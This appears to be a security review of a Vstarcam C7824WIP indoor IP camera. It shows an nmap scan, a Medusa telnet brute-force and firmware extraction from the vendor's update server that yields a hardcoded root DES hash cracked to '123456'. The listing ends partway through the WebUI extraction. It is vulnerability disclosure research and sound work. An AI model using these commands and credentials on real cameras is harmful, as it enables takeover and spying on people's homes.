C7824WIP Security Review

IP_camera_vstarcam_c7824wip

1. Camera specifications

Brand : Vstarcam
Product name : C7824WIP HD indoor IP Camera
Model : C7824WIP
OS : Embedded Linux OS
CPU :

> cat /proc/cpuinfo
Processor       : ARM926EJ-S rev 5 (v5l)
BogoMIPS        : 217.08
Features        : swp half thumb fastmult edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant     : 0x0
CPU part        : 0x926
CPU revision    : 5

Hardware        : hi3518
Revision        : 0000
Serial          : 0000000000000000

2. Security vulnerabilities

root-access
Achievements :
– Remotely take control of the camera (telnet)
– Find the web UI password

Methods :
– Bruteforce : success
– Firmware reverse engineering : success
– Form injection : success

3. Network services analysis

Scan all the active network services on the camera using Nmap :

>nmap -sV 192.168.1.16

Starting Nmap 6.47 ( http://nmap.org ) at 2016-01-21 20:59 SGT
Nmap scan report for 192.168.1.16
Host is up (0.014s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet?
81/tcp open  http    GoAhead-Webs httpd

80/http : The web interface : Documented
23/telnet : Remote command line access : Undocumented

4. Telnet penetration test

4.1 Method 1 : Bruteforce

The password is cracked in a few seconds using Medusa. Hydra fails to crack the password.

>medusa -u root -P passwords.txt -h 192.168.1.16 -M telnet
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 111111 (1 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 11111111 (2 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 112233 (3 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 121212 (4 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123123 (5 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (6 of 370 complete)
ACCOUNT FOUND: [telnet] Host: 192.168.1.16 User: root Password: 123456 [SUCCESS]

The root password : 123456.

4.2 Method 2 : Reverse engineering

4.2.1 Tools
Binwalk

Binwalk is a firmware analysis tool designed for analyzing, reverse engineering and extracting data contained in firmware images.

The last stable version of Binwalk (2.1.1) was not extracting the firmware correctly, so I had to install the 2.0.0. The bug should be solved in the next version.

Install Binwalk 2.0.0 :

> wget https://github.com/devttys0/binwalk/archive/v2.0.0.zip
> unzip v2.0.0.zip
> cd binwalk-2.0.0
> /deps.sh
> ./configure
> make
> make install	
4.2.2 Firmware reverse engineering
Firmware servers and download link

Sniffing the traffic between the Vstarcam firmware upgrade software and Internet allows us to easily identify the servers and the protocol used to retrieve and upgrade camera firmware.
HTTP sniffing

Remote file : http://45.63.8.70/FM/system/firmware.txt

So we can download our firmware (45.63.8.70) using the following link : http://45.63.8.70/FM/system/CH-sys-48.53.64.67.zip

Firmware download and extraction

Create a working folder :

> mkdir firmware
> cd firmware

Download and extract the zipped firmware :

> wget http://45.63.8.70/FM/system/CH-sys-48.53.64.67.zip
> unzip CH-sys-48.53.64.67.zip	

Binary header analysis :

> head -n1 CH-sys-48.53.64.67.bin | hexdump -C
00000000  77 77 77 2e 6f 62 6a 65  63 74 2d 63 61 6d 65 72  |www.object-camer|
00000010  61 2e 63 6f 6d 2e 62 79  2e 68 6f 6e 67 7a 78 2e  |a.com.by.hongzx.|
00000020  73 79 73 74 65 6d 2f 73  79 73 74 65 6d 2f 6c 69  |system/system/li|
00000030  62 2f 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |b/..............|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000060  6c 69 62 73 6e 73 5f 67  63 31 30 30 34 2e 73 6f  |libsns_gc1004.so|
00000070  2e 7a 69 70 00 00 00 00  00 00 00 00 00 00 00 00  |.zip............|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000000a0  e3 23 00 00 43 40 35 30  00 00 00 00 50 4b 03 04  |.#..C@50....PK..|
000000b0  14 00 00 00 08 00 fa 8b  5d 47 89 42 30 43 09 23  |........]G.B0C.#|
000000c0  00 00 93 4a 00 00 22 00  1c 00 73 79 73 74 65 6d  |...J.."...system|
000000d0  2f 73 79 73 74 65 6d 2f  6c 69 62 2f 6c 69 62 73  |/system/lib/libs|
000000e0  6e 73 5f 67 63 31 30 30  34 2e 73 6f 55 54 09 00  |ns_gc1004.soUT..|
000000f0  03 88 e7 31 56 88 e7 31  56 75 78 0b 00 01 04 ed  |...1V..1Vux.....|
00000100  03 00 00 04 ed 03 00 00  e5 7c 0b 78 53 55 d6 f6  |.........|.xSU..|
00000110  3e b9 b4 69 9a cb 69 cf  29 96 8b 92 0a           |>..i..i.)....|

We should be able to use Binwalk to extract the firmware :

> binwalk -Mer CH-sys-48.53.64.67.bin

Scan Time:     2016-01-20 01:02:57
Target File:   CH-sys-48.53.64.67.bin
MD5 Checksum:  58df9214226cfe46760215bfca0c496c
Signatures:    285

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
172           0xAC            Zip archive data, at least v2.0 to extract, compressed size: 8969,  uncompressed size: 19091, name: "system/system/lib/libsns_gc1004.so"
9337          0x2479          End of Zip archive
9499          0x251B          Zip archive data, at least v2.0 to extract, compressed size: 7813,  uncompressed size: 16341, name: "system/system/lib/libsns_ov9712_plus.so"
17518         0x446E          End of Zip archive
17680         0x4510          Zip archive data, at least v2.0 to extract, compressed size: 90121,  uncompressed size: 353248, name: "system/system/lib/libOnvif.so"
107987        0x1A5D3         End of Zip archive
108149        0x1A675         Zip archive data, at least v2.0 to extract, compressed size: 43603,  uncompressed size: 84480, name: "system/system/lib/libvoice_arm.so"
151946        0x2518A         End of Zip archive
152108        0x2522C         Zip archive data, at least v2.0 to extract, compressed size: 130,  uncompressed size: 227, name: "system/init/ipcam.sh"
152406        0x25356         End of Zip archive
152568        0x253F8         Zip archive data, at least v2.0 to extract, compressed size: 402383,  uncompressed size: 886168, name: "system/system/bin/encoder"
555129        0x87879         End of Zip archive
555291        0x8791B         Zip archive data, at least v2.0 to extract, compressed size: 35394,  uncompressed size: 74200, name: "system/system/bin/wifidaemon"
590869        0x90415         End of Zip archive
591031        0x904B7         Zip archive data, at least v2.0 to extract, compressed size: 1852,  uncompressed size: 9692, name: "system/system/bin/grade.sh"
593063        0x90CA7         End of Zip archive
593225        0x90D49         Zip archive data, at least v2.0 to extract, compressed size: 8704,  uncompressed size: 20212, name: "system/system/bin/updata"
602105        0x92FF9         End of Zip archive
602267        0x9309B         Zip archive data, at least v2.0 to extract, compressed size: 1874,  uncompressed size: 4522, name: "system/system/bin/gpio_aplink.ko"
604333        0x938AD         End of Zip archive
604495        0x9394F         Zip archive data, at least v2.0 to extract, compressed size: 7241,  uncompressed size: 16802, name: "system/system/bin/motogpio.ko"
611922        0x95652         End of Zip archive
612084        0x956F4         Zip archive data, at least v1.0 to extract, compressed size: 8,  uncompressed size: 8, name: "system/system/bin/fwversion.bin"
612282        0x957BA         End of Zip archive
612444        0x9585C         Zip archive data, at least v1.0 to extract, compressed size: 9,  uncompressed size: 9, name: "system/system/bin/sysversion.txt"
612645        0x95925         End of Zip archive

Using tree to see the files available :

> tree _CH-sys-48.53.64.67.bin.extracted/
_CH-sys-48.53.64.67.bin.extracted/
└── system
    ├── init
    │   └── ipcam.sh
    └── system
        ├── bin
        │   ├── encoder
        │   ├── fwversion.bin
        │   ├── gpio_aplink.ko
        │   ├── grade.sh
        │   ├── motogpio.ko
        │   ├── sysversion.txt
        │   ├── updata
        │   └── wifidaemon
        └── lib
            ├── libOnvif.so
            ├── libsns_gc1004.so
            ├── libsns_ov9712_plus.so
            └── libvoice_arm.so

5 directories, 13 files

Done !

Firmware analysis and password retrieval

Looking for the files containing the “passwd” string :

> grep -r "passwd" .
Binary file ./system/system/bin/wifidaemon matches
Binary file ./system/system/bin/encoder matches

And check in these files for the password.
– wifidaemon :

> strings system/system/bin/wifidaemon | grep -A 1 -B 1 passwd
iRet %d pkey:%s keyvalue:%s
/etc/passwd
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

– encoder :

> strings system/system/bin/encoder | grep -A 1 -B 1 passwd
factory_user
factory_passwd
factory_alarmserver
--
alarmuser
alarmpasswd
alarmdeviceid
--
===websLaunchCgiProc===
/etc/passwd
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
--
SET_PARAMETER
check_user_passwd  right
check_user_passwd  erro
Unknown RTSP server state[%d]

So the hashed password for root user is : LSiuY7pOmZG2s. This is encrypted, you can’t use this one to login. We need to crack it first :

> echo "root:LSiuY7pOmZG2s" > password.txt
> john password.txt
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
123456           (root)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 17680  trying: 12345 - biteme
Use the "--show" option to display all of the cracked passwords reliably

The root password : 123456.

4.2.3 WebUI reverse engineering

Now that you have a root access, you could go online and retrieve all the WebUI directly from the device. However, we’ll show here the reverse engineering way.

Firmware servers and download link

Sniffing the traffic between the Vstarcam firmware upgrade software and Internet allows us to easily identify the servers and the protocol used to retrieve and upgrade camera WebUI.
HTTP sniffing

Remote file: http://45.63.8.70/FM/vstarcam/firmware.txt

So we can download the WebUI EN53.8.1.13 using the following link : http://45.63.8.70/FM/vstarcam/CH-app-CH53.8.1.13_VSTARCAM.zip

WebUI download and extraction

Create a working folder :

> mkdir webui
> cd webui

Download and extract the zipped firmware :

> wget http://45.63.8.70/FM/vstarcam/CH-app-CH53.8.1.13_VSTARCAM.zip
> unzip CH-app-CH53.8.1.13_VSTARCAM.zip	

Now we can use Binwalk to extract the .bin firmware :

> binwalk -Mer CH-app-EN53.8.1.13_VSTARCAM.bin

Scan Time:     2016-01-21 01:29:23
Target File:   CH-app-EN53.8.1.13_VSTARCAM.bin
MD5 Checksum:  41965a8a4aea9293a0b111e7bf004fcc
Signatures:    285

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
36            0x24            Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/"
98            0x62            Zip encrypted archive data, at least v2.0 to extract, compressed size: 1593,  uncompressed size: 10647, name: "www/admin.htm"
1750          0x6D6           Zip encrypted archive data, at least v2.0 to extract, compressed size: 1583,  uncompressed size: 10326, name: "www/admin2.htm"
3393          0xD41           Zip encrypted archive data, at least v2.0 to extract, compressed size: 3870,  uncompressed size: 17524, name: "www/alarm.htm"
7322          0x1C9A          Zip encrypted archive data, at least v2.0 to extract, compressed size: 116018,  uncompressed size: 137930, name: "www/alarm.pcm"
123399        0x1E207         Zip encrypted archive data, at least v2.0 to extract, compressed size: 857,  uncompressed size: 1972, name: "www/alias.htm"
124315        0x1E59B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 948,  uncompressed size: 2458, name: "www/ap.htm"
125319        0x1E987         Zip encrypted archive data, at least v1.0 to extract, compressed size: 40,  uncompressed size: 28, name: "www/appver.js"
125418        0x1E9EA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 924,  uncompressed size: 2265, name: "www/audio.htm"
126401        0x1EDC1         Zip encrypted archive data, at least v2.0 to extract, compressed size: 250,  uncompressed size: 384, name: "www/audioparam.bin"
126715        0x1EEFB         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1374,  uncompressed size: 4439, name: "www/datetime.htm"
128151        0x1F497         Zip encrypted archive data, at least v2.0 to extract, compressed size: 2935,  uncompressed size: 12570, name: "www/ddns.htm"
131144        0x20048         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1048,  uncompressed size: 2377, name: "www/dns.htm"
132249        0x20499         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/english/"
132319        0x204DF         Zip encrypted archive data, at least v2.0 to extract, compressed size: 213,  uncompressed size: 449, name: "www/english/oem.js"
132596        0x205F4         Zip encrypted archive data, at least v2.0 to extract, compressed size: 10268,  uncompressed size: 31357, name: "www/english/string.js"
142931        0x22E53         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1449,  uncompressed size: 5038, name: "www/ftp.htm"
144437        0x23435         Zip encrypted archive data, at least v2.0 to extract, compressed size: 785,  uncompressed size: 13019, name: "www/functions.htm"
145285        0x23785         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/images/"
145354        0x237CA         Zip encrypted archive data, at least v1.0 to extract, compressed size: 289,  uncompressed size: 277, name: "www/images/2_10.gif"
145708        0x2392C         Zip encrypted archive data, at least v2.0 to extract, compressed size: 101,  uncompressed size: 95, name: "www/images/2_11.gif"
145874        0x239D2         Zip encrypted archive data, at least v2.0 to extract, compressed size: 164,  uncompressed size: 197, name: "www/images/2_13.gif"
146103        0x23AB7         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1726,  uncompressed size: 1714, name: "www/images/2_16.gif"
147894        0x241B6         Zip encrypted archive data, at least v1.0 to extract, compressed size: 676,  uncompressed size: 664, name: "www/images/2_17.gif"
148635        0x2449B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 101,  uncompressed size: 95, name: "www/images/2_19.gif"
148801        0x24541         Zip encrypted archive data, at least v1.0 to extract, compressed size: 678,  uncompressed size: 666, name: "www/images/2_20.gif"
149544        0x24828         Zip encrypted archive data, at least v1.0 to extract, compressed size: 291,  uncompressed size: 279, name: "www/images/2_27.gif"
149900        0x2498C         Zip encrypted archive data, at least v2.0 to extract, compressed size: 62,  uncompressed size: 54, name: "www/images/2_item.gif"
150029        0x24A0D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 155,  uncompressed size: 154, name: "www/images/333.gif"
150248        0x24AE8         Zip encrypted archive data, at least v2.0 to extract, compressed size: 326,  uncompressed size: 512, name: "www/images/alarm.gif"
150640        0x24C70         Zip encrypted archive data, at least v2.0 to extract, compressed size: 2438,  uncompressed size: 3516, name: "www/images/alarm.wav"
153144        0x25638         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1078,  uncompressed size: 1167, name: "www/images/alert.gif"
154288        0x25AB0         Zip encrypted archive data, at least v2.0 to extract, compressed size: 627,  uncompressed size: 643, name: "www/images/autopos.gif"
154983        0x25D67         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1157,  uncompressed size: 1145, name: "www/images/back.gif"
156205        0x2622D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 214,  uncompressed size: 211, name: "www/images/bg.png"
156482        0x26342         Zip encrypted archive data, at least v2.0 to extract, compressed size: 16438,  uncompressed size: 29471, name: "www/images/bg_right.jpg"
172989        0x2A3BD         Zip encrypted archive data, at least v2.0 to extract, compressed size: 12816,  uncompressed size: 12911, name: "www/images/btn_circle.gif"
185876        0x2D614         Zip encrypted archive data, at least v2.0 to extract, compressed size: 548,  uncompressed size: 600, name: "www/images/btn_jianting.gif"
186497        0x2D881         Zip encrypted archive data, at least v2.0 to extract, compressed size: 544,  uncompressed size: 600, name: "www/images/btn_jianting_on.gif"
187117        0x2DAED         Zip encrypted archive data, at least v2.0 to extract, compressed size: 763,  uncompressed size: 797, name: "www/images/btn_luxiang.gif"
187952        0x2DE30         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1008,  uncompressed size: 1192, name: "www/images/btn_luxiang_on.gif"
189035        0x2E26B         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1328,  uncompressed size: 1316, name: "www/images/btn_paizhao.gif"
190435        0x2E7E3         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1328,  uncompressed size: 1316, name: "www/images/btn_shezhi.gif"
191834        0x2ED5A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 554,  uncompressed size: 622, name: "www/images/btn_talk.gif"
192457        0x2EFC9         Zip encrypted archive data, at least v2.0 to extract, compressed size: 705,  uncompressed size: 1025, name: "www/images/btn_talk_on.gif"
193234        0x2F2D2         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1775,  uncompressed size: 1763, name: "www/images/CD.gif"
195072        0x2FA00         Zip encrypted archive data, at least v1.0 to extract, compressed size: 2002,  uncompressed size: 1990, name: "www/images/client.gif"
197141        0x30215         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1111,  uncompressed size: 1406, name: "www/images/clr_bright.gif"
198323        0x306B3         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1082,  uncompressed size: 1392, name: "www/images/clr_contast.gif"
199477        0x30B35         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1133,  uncompressed size: 1393, name: "www/images/clr_hue.gif"
200678        0x30FE6         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1183,  uncompressed size: 1378, name: "www/images/clr_saturation.gif"
201936        0x314D0         Zip encrypted archive data, at least v2.0 to extract, compressed size: 490,  uncompressed size: 596, name: "www/images/del.gif"
202490        0x316FA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 499,  uncompressed size: 598, name: "www/images/download.gif"
203058        0x31932         Zip encrypted archive data, at least v2.0 to extract, compressed size: 141,  uncompressed size: 132, name: "www/images/elogo.gif"
203265        0x31A01         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1932,  uncompressed size: 1920, name: "www/images/firefox.gif"
205265        0x321D1         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4536,  uncompressed size: 4593, name: "www/images/green.gif"
209867        0x333CB         Zip encrypted archive data, at least v2.0 to extract, compressed size: 915,  uncompressed size: 1049, name: "www/images/hpatrol.gif"
210850        0x337A2         Zip encrypted archive data, at least v1.0 to extract, compressed size: 637,  uncompressed size: 625, name: "www/images/hpatrol_down.gif"
211560        0x33A68         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1123,  uncompressed size: 1367, name: "www/images/hpatrol_up.gif"
212754        0x33F12         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1623,  uncompressed size: 1611, name: "www/images/IE.gif"
214440        0x345A8         Zip encrypted archive data, at least v2.0 to extract, compressed size: 29969,  uncompressed size: 30067, name: "www/images/index_bg.gif"
244478        0x3BAFE         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1849,  uncompressed size: 1837, name: "www/images/iphone.gif"
246394        0x3C27A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1131,  uncompressed size: 1363, name: "www/images/ir0.gif"
247589        0x3C725         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1145,  uncompressed size: 1355, name: "www/images/ir1.gif"
248798        0x3CBDE         Zip encrypted archive data, at least v2.0 to extract, compressed size: 575,  uncompressed size: 621, name: "www/images/line.gif"
249438        0x3CE5E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 2953,  uncompressed size: 2955, name: "www/images/logo.gif"
252456        0x3DA28         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1580,  uncompressed size: 1622, name: "www/images/logo1.gif"
254102        0x3E096         Zip encrypted archive data, at least v1.0 to extract, compressed size: 3118,  uncompressed size: 3106, name: "www/images/logo2.gif"
257286        0x3ED06         Zip encrypted archive data, at least v2.0 to extract, compressed size: 626,  uncompressed size: 639, name: "www/images/mirror.gif"
257979        0x3EFBB         Zip encrypted archive data, at least v2.0 to extract, compressed size: 921,  uncompressed size: 940, name: "www/images/mirror_on.gif"
258970        0x3F39A         Zip encrypted archive data, at least v1.0 to extract, compressed size: 184,  uncompressed size: 172, name: "www/images/modellogo.gif"
259224        0x3F498         Zip encrypted archive data, at least v2.0 to extract, compressed size: 301,  uncompressed size: 301, name: "www/images/nav-1.gif"
259591        0x3F607         Zip encrypted archive data, at least v2.0 to extract, compressed size: 254,  uncompressed size: 258, name: "www/images/nav.gif"
259909        0x3F745         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1019,  uncompressed size: 1145, name: "www/images/network.gif"
260996        0x3FB84         Zip encrypted archive data, at least v2.0 to extract, compressed size: 459,  uncompressed size: 580, name: "www/images/no.gif"
261518        0x3FD8E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 270,  uncompressed size: 337, name: "www/images/ok.gif"
261851        0x3FEDB         Zip encrypted archive data, at least v2.0 to extract, compressed size: 852,  uncompressed size: 1165, name: "www/images/option.gif"
262770        0x40272         Zip encrypted archive data, at least v1.0 to extract, compressed size: 2007,  uncompressed size: 1995, name: "www/images/osd01.gif"
264843        0x40A8B         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1628,  uncompressed size: 1616, name: "www/images/osd02.gif"
266537        0x41129         Zip encrypted archive data, at least v2.0 to extract, compressed size: 233,  uncompressed size: 229, name: "www/images/p.gif"
266832        0x41250         Zip encrypted archive data, at least v1.0 to extract, compressed size: 7826,  uncompressed size: 7814, name: "www/images/pan_1.gif"
274724        0x43124         Zip encrypted archive data, at least v1.0 to extract, compressed size: 999,  uncompressed size: 987, name: "www/images/pan_2.gif"
275789        0x4354D         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1091,  uncompressed size: 1079, name: "www/images/pan_3.gif"
276946        0x439D2         Zip encrypted archive data, at least v1.0 to extract, compressed size: 16746,  uncompressed size: 16734, name: "www/images/pan_4.gif"
293758        0x47B7E         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1842,  uncompressed size: 1830, name: "www/images/phone.gif"
295666        0x482F2         Zip encrypted archive data, at least v1.0 to extract, compressed size: 779,  uncompressed size: 767, name: "www/images/playback.gif"
296514        0x48642         Zip encrypted archive data, at least v2.0 to extract, compressed size: 923,  uncompressed size: 1030, name: "www/images/ptz_19.gif"
297504        0x48A20         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1017,  uncompressed size: 1076, name: "www/images/ptz_24.gif"
298588        0x48E5C         Zip encrypted archive data, at least v2.0 to extract, compressed size: 901,  uncompressed size: 1015, name: "www/images/ptz_26.gif"
299556        0x49224         Zip encrypted archive data, at least v2.0 to extract, compressed size: 910,  uncompressed size: 1025, name: "www/images/ptz_29.gif"
300533        0x495F5         Zip encrypted archive data, at least v2.0 to extract, compressed size: 911,  uncompressed size: 1021, name: "www/images/ptz_34.gif"
301511        0x499C7         Zip encrypted archive data, at least v2.0 to extract, compressed size: 714,  uncompressed size: 809, name: "www/images/pt_speed.gif"
302294        0x49CD6         Zip encrypted archive data, at least v1.0 to extract, compressed size: 362,  uncompressed size: 350, name: "www/images/rec.gif"
302720        0x49E80         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1232,  uncompressed size: 1224, name: "www/images/record.gif"
304019        0x4A393         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4595,  uncompressed size: 4644, name: "www/images/red.gif"
308678        0x4B5C6         Zip encrypted archive data, at least v2.0 to extract, compressed size: 624,  uncompressed size: 640, name: "www/images/reversal.gif"
309371        0x4B87B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 929,  uncompressed size: 940, name: "www/images/reversal_on.gif"
310372        0x4BC64         Zip encrypted archive data, at least v1.0 to extract, compressed size: 368,  uncompressed size: 356, name: "www/images/signal0.png"
310808        0x4BE18         Zip encrypted archive data, at least v1.0 to extract, compressed size: 375,  uncompressed size: 363, name: "www/images/signal1.png"
311251        0x4BFD3         Zip encrypted archive data, at least v1.0 to extract, compressed size: 374,  uncompressed size: 362, name: "www/images/signal2.png"
311693        0x4C18D         Zip encrypted archive data, at least v1.0 to extract, compressed size: 380,  uncompressed size: 368, name: "www/images/signal3.png"
312141        0x4C34D         Zip encrypted archive data, at least v1.0 to extract, compressed size: 380,  uncompressed size: 368, name: "www/images/signal4.png"
312589        0x4C50D         Zip encrypted archive data, at least v1.0 to extract, compressed size: 369,  uncompressed size: 357, name: "www/images/signal5.png"
313026        0x4C6C2         Zip encrypted archive data, at least v2.0 to extract, compressed size: 59,  uncompressed size: 49, name: "www/images/space.gif"
313151        0x4C73F         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1004,  uncompressed size: 1302, name: "www/images/switchoff_up.gif"
314228        0x4CB74         Zip encrypted archive data, at least v2.0 to extract, compressed size: 987,  uncompressed size: 1281, name: "www/images/switchon_up.gif"
315287        0x4CF97         Zip encrypted archive data, at least v2.0 to extract, compressed size: 927,  uncompressed size: 1055, name: "www/images/vpatrol.gif"
316282        0x4D37A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 708,  uncompressed size: 884, name: "www/images/vpatrol_down.gif"
317063        0x4D687         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1154,  uncompressed size: 1401, name: "www/images/vpatrol_up.gif"
318288        0x4DB50         Zip encrypted archive data, at least v2.0 to extract, compressed size: 913,  uncompressed size: 945, name: "www/images/x1_off.gif"
319268        0x4DF24         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1257,  uncompressed size: 1290, name: "www/images/x1_on.gif"
320591        0x4E44F         Zip encrypted archive data, at least v2.0 to extract, compressed size: 851,  uncompressed size: 876, name: "www/images/x4_off.gif"
321509        0x4E7E5         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1321,  uncompressed size: 1607, name: "www/images/x4_on.gif"
322896        0x4ED50         Zip encrypted archive data, at least v1.0 to extract, compressed size: 942,  uncompressed size: 930, name: "www/images/x9_off.gif"
323905        0x4F141         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1416,  uncompressed size: 1674, name: "www/images/x9_on.gif"
325387        0x4F70B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 539,  uncompressed size: 1030, name: "www/index.htm"
325985        0x4F961         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1920,  uncompressed size: 8471, name: "www/ip.htm"
327961        0x50119         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1378,  uncompressed size: 4199, name: "www/iphone.htm"
329399        0x506B7         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/jquery/"
329468        0x506FC         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/jquery/images/"
329544        0x50748         Zip encrypted archive data, at least v2.0 to extract, compressed size: 265,  uncompressed size: 260, name: "www/jquery/images/ui-bg_diagonals-thick_18_b81900_40x40.png"
329914        0x508BA         Zip encrypted archive data, at least v1.0 to extract, compressed size: 263,  uncompressed size: 251, name: "www/jquery/images/ui-bg_diagonals-thick_20_666666_40x40.png"
330282        0x50A2A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 114,  uncompressed size: 180, name: "www/jquery/images/ui-bg_flat_0_aaaaaa_40x100.png"
330490        0x50AFA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 112,  uncompressed size: 178, name: "www/jquery/images/ui-bg_flat_10_000000_40x100.png"
330697        0x50BC9         Zip encrypted archive data, at least v2.0 to extract, compressed size: 112,  uncompressed size: 178, name: "www/jquery/images/ui-bg_flat_75_ffffff_40x100.png"
330904        0x50C98         Zip encrypted archive data, at least v2.0 to extract, compressed size: 114,  uncompressed size: 104, name: "www/jquery/images/ui-bg_glass_100_f6f6f6_1x400.png"
331114        0x50D6A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 132,  uncompressed size: 125, name: "www/jquery/images/ui-bg_glass_100_fdf5ce_1x400.png"
331342        0x50E4E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 131,  uncompressed size: 120, name: "www/jquery/images/ui-bg_glass_55_fbf9ee_1x400.png"
331568        0x50F30         Zip encrypted archive data, at least v2.0 to extract, compressed size: 115,  uncompressed size: 105, name: "www/jquery/images/ui-bg_glass_65_ffffff_1x400.png"
331778        0x51002         Zip encrypted archive data, at least v2.0 to extract, compressed size: 121,  uncompressed size: 111, name: "www/jquery/images/ui-bg_glass_75_dadada_1x400.png"
331994        0x510DA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 120,  uncompressed size: 110, name: "www/jquery/images/ui-bg_glass_75_e6e6e6_1x400.png"
332209        0x511B1         Zip encrypted archive data, at least v2.0 to extract, compressed size: 130,  uncompressed size: 119, name: "www/jquery/images/ui-bg_glass_95_fef1ec_1x400.png"
332434        0x51292         Zip encrypted archive data, at least v2.0 to extract, compressed size: 3576,  uncompressed size: 3762, name: "www/jquery/images/ui-bg_gloss-wave_35_f6a828_500x100.png"
336112        0x520F0         Zip encrypted archive data, at least v2.0 to extract, compressed size: 99,  uncompressed size: 90, name: "www/jquery/images/ui-bg_highlight-soft_100_eeeeee_1x100.png"
336316        0x521BC         Zip encrypted archive data, at least v2.0 to extract, compressed size: 110,  uncompressed size: 101, name: "www/jquery/images/ui-bg_highlight-soft_75_cccccc_1x100.png"
336530        0x52292         Zip encrypted archive data, at least v2.0 to extract, compressed size: 140,  uncompressed size: 129, name: "www/jquery/images/ui-bg_highlight-soft_75_ffe45c_1x100.png"
336774        0x52386         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4152,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_222222_256x240.png"
341017        0x53419         Zip encrypted archive data, at least v2.0 to extract, compressed size: 5179,  uncompressed size: 5355, name: "www/jquery/images/ui-icons_228ef1_256x240.png"
346287        0x548AF         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_2e83ff_256x240.png"
350529        0x55941         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_454545_256x240.png"
354771        0x569D3         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_888888_256x240.png"
359013        0x57A65         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4151,  uncompressed size: 4369, name: "www/jquery/images/ui-icons_cd0a0a_256x240.png"
